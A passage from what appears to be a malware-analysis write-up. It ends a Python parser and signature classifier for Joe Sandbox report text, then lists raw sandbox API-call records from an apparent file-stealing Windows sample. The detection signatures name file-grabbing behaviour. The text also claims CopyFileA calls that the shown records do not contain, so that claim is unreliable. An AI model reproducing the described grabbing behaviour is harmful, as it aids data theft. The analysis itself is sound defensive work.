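    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Behavioural signatures (constructed for this example): a record is tagged
# when its call set contains every API named in the set.
SIGNATURES = {
    # Directory walk plus CopyFile: a file-grabber loop.
    "file_grabber": {"FindFirstFileA", "FindNextFileA", "CopyFileA"},
    # Named-event probe then ExitProcess: consistent with a run-once guard.
    "event_probe_then_exit": {"OpenEventA", "CreateEventA", "ExitProcess"},
    # Known-folder lookup feeding string concatenation: building a target path.
    "known_folder_path_build": {"SHGetFolderPathA", "lstrcatA"},
}


def parse_records(text):
    """Split report text into function records, each an ordered list of the
    API calls listed under its 'APIs' header (subcall lines included)."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"calls": [], "fuzzy_hash": None}
            records.append(current)
            continue
        if current is None:
            continue
        if stripped.startswith("• Instruction Fuzzy Hash:"):
            current["fuzzy_hash"] = stripped.split(":", 1)[1].strip()
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            current["calls"].append({
                "api": m.group("api"),
                "module": m.group("mod"),
                "args": args,  # raw hex immediates, '?' where the plugin could not resolve
                "ref": int(m.group("ref"), 16),
                "subcall": m.group("sub"),
            })
    return records


def classify(record):
    """Names of every signature whose API set is present in the record."""
    apis = {c["api"] for c in record["calls"]}
    return sorted(name for name, need in SIGNATURES.items() if need <= apis)


def immediate_args(record, api):
    """Decode the hex immediates of each call to `api`: Sleep(00001770)
    becomes [6000], i.e. a 6 s delay. '?' and symbolic arguments are skipped."""
    out = []
    for c in record["calls"]:
        if c["api"] == api:
            out.append([int(a, 16) for a in c["args"] if re.fullmatch(r"[0-9A-F]+", a)])
    return out


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        seq = " -> ".join(c["api"] for c in rec["calls"])
        print(f"record {i} [{rec['fuzzy_hash'][:12]}...]: {seq}")
        print("  tags:", classify(rec), " Sleep ms:", immediate_args(rec, "Sleep"))
```

The whole report text can be fed to `parse_records` unchanged, since only lines matching the API-call pattern are consumed; "API ID", "String ID" and "Source File" lines fall through. Keeping subcall lines in the sequence matters here: the CopyFileA/DeleteFileA that make the second record a grabber live in subcall 00414910, not in the function itself, so a matcher that only looked at direct calls would miss it.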
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SystemTimelstrcpy
                                      • String ID: cI@$cI@
                                      • API String ID: 62757014-1697673767
                                      • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                      • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                      • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                      • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                      • lstrcatA.KERNEL32(?,008806C8), ref: 004150A8
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                      • String ID: aA
                                      • API String ID: 2699682494-2567749500
                                      • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                      • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                      • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                      • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 0230A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0230A094
                                      • lstrlen.KERNEL32(00000000), ref: 0230BF06
                                        • Part of subcall function 02319097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 023190B9
                                      • StrStrA.SHLWAPI(00000000,004213E0), ref: 0230BF34
                                      • lstrlen.KERNEL32(00000000), ref: 0230C00C
                                      • lstrlen.KERNEL32(00000000), ref: 0230C020
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                      • String ID:
                                      • API String ID: 1440504306-0
                                      • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                      • Instruction ID: 8e5d6a731b1ce68f5fb65d813c27557c5dc2e839c4b91f15a206b1826fc24d43
                                      • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                      • Instruction Fuzzy Hash: EFB12E71911218ABCB2CFBA0DD95EEEB73AAF54306F40456DE506A3090EF346B48CF61
                                      APIs
                                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                      • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFileNextlstrcat
                                      • String ID: !=A
                                      • API String ID: 3840410801-2919091325
                                      • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                      • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                      • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                      • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                      APIs
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                      • lstrcat.KERNEL32(?,00000000), ref: 023151E1
                                      • lstrcat.KERNEL32(?,00421070), ref: 023151FE
                                      • lstrcat.KERNEL32(?,0064A5F8), ref: 02315212
                                      • lstrcat.KERNEL32(?,00421074), ref: 02315224
                                        • Part of subcall function 02314B77: wsprintfA.USER32 ref: 02314B93
                                        • Part of subcall function 02314B77: FindFirstFileA.KERNEL32(?,?), ref: 02314BAA
                                        • Part of subcall function 02314B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02314BD8
                                        • Part of subcall function 02314B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02314BEE
                                        • Part of subcall function 02314B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02314DE4
                                        • Part of subcall function 02314B77: FindClose.KERNEL32(000000FF), ref: 02314DF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                      • Instruction ID: a7e321287b353cf9a20c3ba66cd27039eaf3c544813534524ec6b9ed67e9e56f
                                      • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                      • Instruction Fuzzy Hash: 3121CB7AA402047BC728FBF0DC85EE9337EAB55700F404189B689921C0DE7496C9CFA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID:
                                      • API String ID: 1206339513-0
                                      • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction ID: a0bf94f508eadef944419ed47824c371fa0d11878723af2e6ca55e7156244ae3
                                      • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction Fuzzy Hash: AC01DA79640108FFCB04DFECD998EAE7BBAEF49394F108148F9099B301C635AA50DB95